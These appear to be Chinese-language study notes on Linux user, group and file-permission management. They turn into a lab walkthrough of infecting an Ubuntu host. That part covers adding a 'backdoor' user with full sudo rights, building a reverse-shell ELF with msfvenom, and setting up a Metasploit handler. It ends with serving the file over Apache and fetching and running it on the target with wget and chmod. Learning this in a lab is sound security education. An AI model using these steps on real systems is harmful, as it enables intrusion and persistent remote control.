Linux系统基础2
Linux系统服务安全
Linux用户与组管理
植入后门用户
新建用户:useradd -m 用户名
设置密码:passwd 用户名
临时以root权限执行指令:
sudo (具体命令)
nano /etc/sudoers 增加:
(用户名) ALL=(ALL:ALL) ALL
设置用户root权限:
nano/etc/passwd
用户名:密码:用户ID:组ID:用户说明:用户目录:命令解释器 例: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
用户(user)
创建用户:adduser 用户名
每个使用Linux系统的个体或进程都需要一个用户账户,系统资源访问的最小权限单元. root用户:UID=0,拥有最高权限 系统用户:UID 1-999(通常用于服务进程) 普通用户:UID ≥1000(手动创建的用户)
组(group)
批量管理用户权限的集合,每个组都有一个GID(组ID). 主组(Primary Group):用户创建文件时默认归属组
Linux文件权限
ls:列出当前目录下文件 l/ls -l:列出当前目录下文件(详细) drwsx-xr-x owner-group-other (u-g-o) 'd'表示目录 ‘l‘表示软链接 ’b‘表示块设备 ’c‘表示字符设备 ’s‘表示socket文件 ’p‘表示管道 ’-‘表示普通文件
’w‘表示可写 ’x‘表示可执行 ’r‘表示可读
drwxr:rwsx表示文件拥有者权限 xr:表示文件所属组权限 x:表示其他用户权限
Linux权限管理
更改文件所有者 chown:更改文件所有者 chown 用户:用户组 test 例: chown user:group filename
修改文件权限
chmod:修改文件权限 chmod 权限 文件名 例: chmod 755 文件名
chmod u=rwx,g=rx,o=rx 文件名 chmod +x 文件名 chmod u+x 文件名 chmod g-x 文件名
Linux之木马入侵检测
木马与肉鸡
木马是伪装成合法软件、隐蔽运行在目标设备中,用于长期控制设备或窃取数据的恶意程序。 肉鸡是被黑客通过木马等恶意程序秘密控制的设备。
攻击流程
制作木马(kali)
黑客必备工具:MetasploiFramework(MSF)
- 生成木马程序:
msfvenom-plinux/x64/shell/reverse_tcpLHOST=攻击机ip(Kali)LPORT=9999-felf-oshell.elf
- 启动控制程序:
msfconsole use exploit/multi/handler set payloadlinux/x64/shell/reverse_tcp set lhost攻击机ip(Kali) set lport9999 run
植入木马(ubuntu)
- 在Kali中开启Apache服务,供Ubuntu下载
mvshell.elf /var/www/html #将当前目录下的 shell.elf 移动到 /var/www/html 目录 serviceapache2start #启动Apache,提供下载服务
- 利用SSH控制Ubuntu下载木马:
wgethttp://攻击者ip(Kali)/shell.elf-Oshell.elf #从指定地址下载文件并保存为当前目录的shell.elf
启动木马(运行权限)
启动下载的木马程序:
./shell.elf
#查看文件权限 (或者 ls -l)
> ll
#修改文件权限
>chmod+x shell.elf
# 增加执行权限后,运行木马
>./shell.elf